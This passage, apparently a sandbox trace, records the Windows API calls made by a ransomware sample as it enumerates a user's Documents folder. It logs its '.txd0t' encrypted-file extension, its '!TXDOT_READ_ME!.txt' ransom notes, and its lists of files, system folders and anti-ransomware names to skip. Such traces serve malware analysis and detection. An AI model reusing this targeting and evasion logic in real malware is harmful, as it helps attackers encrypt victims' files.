StrCmpW (psz1=".", psz2=".") returned 0 [0119.448] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.448] StrCmpW (psz1="..", psz2=".") returned 1 [0119.448] StrCmpW (psz1="..", psz2="..") returned 0 [0119.448] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x516d0a53, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x516d0a53, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5171c524, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.448] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0119.448] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0119.448] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0119.448] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0119.448] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt" [0119.448] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0119.448] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0119.448] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0119.448] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x42600, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst.txd0t", cAlternateFileName="KKCIE@~1.TXD")) returned 1 [0119.448] StrCmpW (psz1="kkcie@kdj.kd.pst.txd0t", psz2=".") returned 1 [0119.448] StrCmpW (psz1="kkcie@kdj.kd.pst.txd0t", psz2="..") returned 1 [0119.448] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0119.448] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0119.448] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", psz2="kkcie@kdj.kd.pst.txd0t", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t" [0119.449] PathFindExtensionW (pszPath="kkcie@kdj.kd.pst.txd0t") returned=".txd0t" [0119.449] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.449] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x42600, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst.txd0t", cAlternateFileName="KKCIE@~1.TXD")) returned 0 [0119.449] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0119.449] GetProcessHeap () returned 0xe30000 [0119.449] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0119.449] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a10cb0, ftCreationTime.dwHighDateTime=0x1d5b064, ftLastAccessTime.dwLowDateTime=0x8f772f70, ftLastAccessTime.dwHighDateTime=0x1d5c4c2, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7d58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQnuWmakq.docx.txd0t", cAlternateFileName="QQNUWM~1.TXD")) returned 1 [0119.449] StrCmpW (psz1="QQnuWmakq.docx.txd0t", psz2=".") returned 1 [0119.449] StrCmpW (psz1="QQnuWmakq.docx.txd0t", psz2="..") returned 1 [0119.449] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.449] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.449] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="QQnuWmakq.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t" [0119.449] PathFindExtensionW (pszPath="QQnuWmakq.docx.txd0t") returned=".txd0t" [0119.449] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.449] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e473b0, ftCreationTime.dwHighDateTime=0x1d5f07a, ftLastAccessTime.dwLowDateTime=0xe5de8050, ftLastAccessTime.dwHighDateTime=0x1d58ea5, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xea4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quCysrsmVF.pptx.txd0t", cAlternateFileName="QUCYSR~1.TXD")) returned 1 [0119.449] StrCmpW (psz1="quCysrsmVF.pptx.txd0t", psz2=".") returned 1 [0119.449] StrCmpW (psz1="quCysrsmVF.pptx.txd0t", psz2="..") returned 1 [0119.449] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.449] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.449] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="quCysrsmVF.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t" [0119.449] PathFindExtensionW (pszPath="quCysrsmVF.pptx.txd0t") returned=".txd0t" [0119.449] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.449] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab726a00, ftCreationTime.dwHighDateTime=0x1d5ef97, ftLastAccessTime.dwLowDateTime=0x2fc4f790, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0x516d0a53, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x119cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sA2u-LPe-LiGoMos.pdf.txd0t", cAlternateFileName="SA2U-L~1.TXD")) returned 1 [0119.449] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf.txd0t", psz2=".") returned 1 [0119.449] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf.txd0t", psz2="..") returned 1 [0119.449] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.449] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.449] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="sA2u-LPe-LiGoMos.pdf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t" [0119.449] PathFindExtensionW (pszPath="sA2u-LPe-LiGoMos.pdf.txd0t") returned=".txd0t" [0119.449] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.449] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bd450c0, ftCreationTime.dwHighDateTime=0x1d5ea9b, ftLastAccessTime.dwLowDateTime=0xb5159f50, ftLastAccessTime.dwHighDateTime=0x1d5f00a, ftLastWriteTime.dwLowDateTime=0x516f62d9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcf06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spmR iwVLu JE 9B.rtf.txd0t", cAlternateFileName="SPMRIW~1.TXD")) returned 1 [0119.449] StrCmpW (psz1="spmR iwVLu JE 9B.rtf.txd0t", psz2=".") returned 1 [0119.449] StrCmpW (psz1="spmR iwVLu JE 9B.rtf.txd0t", psz2="..") returned 1 [0119.450] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="spmR iwVLu JE 9B.rtf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t" [0119.450] PathFindExtensionW (pszPath="spmR iwVLu JE 9B.rtf.txd0t") returned=".txd0t" [0119.450] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.450] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71682a0, ftCreationTime.dwHighDateTime=0x1d5e783, ftLastAccessTime.dwLowDateTime=0x4ecffce0, ftLastAccessTime.dwHighDateTime=0x1d5e1c8, ftLastWriteTime.dwLowDateTime=0x516f62d9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf00c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U8_NH2Y.pdf.txd0t", cAlternateFileName="U8_NH2~1.TXD")) returned 1 [0119.450] StrCmpW (psz1="U8_NH2Y.pdf.txd0t", psz2=".") returned 1 [0119.450] StrCmpW (psz1="U8_NH2Y.pdf.txd0t", psz2="..") returned 1 [0119.450] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="U8_NH2Y.pdf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t" [0119.450] PathFindExtensionW (pszPath="U8_NH2Y.pdf.txd0t") returned=".txd0t" [0119.450] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.450] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e48d30, ftCreationTime.dwHighDateTime=0x1d5e4fa, ftLastAccessTime.dwLowDateTime=0x94f1d180, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xedec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UgOWYrVuYDiW8pkWKYl.xls.txd0t", cAlternateFileName="UGOWYR~1.TXD")) returned 1 [0119.450] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls.txd0t", psz2=".") returned 1 [0119.450] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls.txd0t", psz2="..") returned 1 [0119.450] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="UgOWYrVuYDiW8pkWKYl.xls.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t" [0119.450] PathFindExtensionW (pszPath="UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned=".txd0t" [0119.450] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.450] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8695d80, ftCreationTime.dwHighDateTime=0x1d5e7fb, ftLastAccessTime.dwLowDateTime=0xb960170, ftLastAccessTime.dwHighDateTime=0x1d5e567, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1009d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ut8OaMa5zK99bj4EvRQ.csv.txd0t", cAlternateFileName="UT8OAM~1.TXD")) returned 1 [0119.450] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv.txd0t", psz2=".") returned 1 [0119.450] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv.txd0t", psz2="..") returned 1 [0119.450] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.450] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="ut8OaMa5zK99bj4EvRQ.csv.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t" [0119.450] PathFindExtensionW (pszPath="ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned=".txd0t" [0119.450] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.450] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea6c390, ftCreationTime.dwHighDateTime=0x1d5ed80, ftLastAccessTime.dwLowDateTime=0x860206d0, ftLastAccessTime.dwHighDateTime=0x1d5e43f, ftLastWriteTime.dwLowDateTime=0x518c002b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3345, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yvlM_ciBT0jsrUW.pptx.txd0t", cAlternateFileName="YVLM_C~1.TXD")) returned 1 [0119.450] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx.txd0t", psz2=".") returned 1 [0119.450] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx.txd0t", psz2="..") returned 1 [0119.451] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.451] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.451] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="yvlM_ciBT0jsrUW.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t" [0119.451] PathFindExtensionW (pszPath="yvlM_ciBT0jsrUW.pptx.txd0t") returned=".txd0t" [0119.451] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0119.451] FindNextFileW (in: hFindFile=0xec1df0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 1 [0119.451] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2=".") returned 1 [0119.451] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2="..") returned 1 [0119.451] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0119.451] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0119.451] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Z5Oif6_Mr_Ui", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system32\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\local\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\boot\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\perflogs\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\programdata\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\drivers\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\wsus\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="crypt_detect") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="cryptolocker") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="ransomware") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\WINDOWS") returned 0x0 [0119.451] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.452] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="C:\\Program Files") returned 0x0 [0119.452] GetProcessHeap () returned 0xe30000 [0119.452] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ce) returned 0xed39f8 [0119.452] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0119.452] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", psz2="\\*", cchMax=1102 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*" [0119.452] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\*", lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0119.452] StrCmpW (psz1=".", psz2=".") returned 0 [0119.452] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.452] StrCmpW (psz1="..", psz2=".") returned 1 [0119.452] StrCmpW (psz1="..", psz2="..") returned 0 [0119.452] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599eb90 | out: lpFindFileData=0x599eb90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x518e615d, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x518e615d, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5190c39f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0119.452] StrCmpW 